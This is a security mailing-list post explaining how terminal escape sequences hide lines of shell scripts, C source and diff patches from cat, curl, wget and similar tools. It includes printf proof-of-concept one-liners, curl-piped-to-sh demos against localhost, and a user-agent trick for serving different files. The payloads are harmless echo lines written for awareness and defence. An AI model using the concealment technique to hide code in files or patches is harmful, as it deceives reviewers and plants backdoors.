Federico Bento <up201407890 () alunos dcc fc up pt>
So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?"
http://www.openwall.com/lists/oss-security/2015/08/11/8
This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.
How it technically works:
A terminal escape sequence is a special sequence of characters that is printed (like any other text). If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.
While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.
$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!
As you can see, our beloved 'cat' cheated on us. Why?
Because instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action. And this action moves the cursor up X times, overwriting what is above it X lines. But this doesn't affect only 'cat', it affects everything that interprets escape sequences.
$ head backdoor.sh
#!/bin/bash
echo doing something very nice!
$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!
$ more backdoor.sh
#!/bin/bash
echo doing something very nice!
It's not over yet!
$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
But if we pipe it into a shell...
$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!
$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!
You might be thinking "If I opened that in my browser, I would detect it being malicious!"
Well, think again...
One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget,
and make them download the malicious file, if not,
redirect them to a legitimate file that looks like the original output. Your browser would fool you then.
I wouldn't even be surprised if most of those install scripts that make use of these 'pipe into sh' bullcrap abused this. I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files... It's no secret, most of us rely on 'cat' to view files. I guess this is one black kitty, giving you bad luck.
Here's another example with a .c file
$ printf '#include <stdio.h>\n\nint main()\n{\ntprintf("doing something evil\n");\nt/*\033[2A\nt/* This simple program doesnt do much... */\ntprintf("doing something very nice\n");\ntreturn 0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>
int main()
{
/* This simple program doesnt do much... */
printf("doing something very nice\n");
return 0;
}
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice
'diff' also interprets escape sequences and so do the resulting patches
going back to the first example, imagine I have a backdoored.sh that is backdoored, and a legit.sh that does what it's output tells us.
$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!
$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh 2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
#!/bin/bash
-echo doing something very nice!
+echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!
Hint:
'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.
s/party/hack like it's 1999
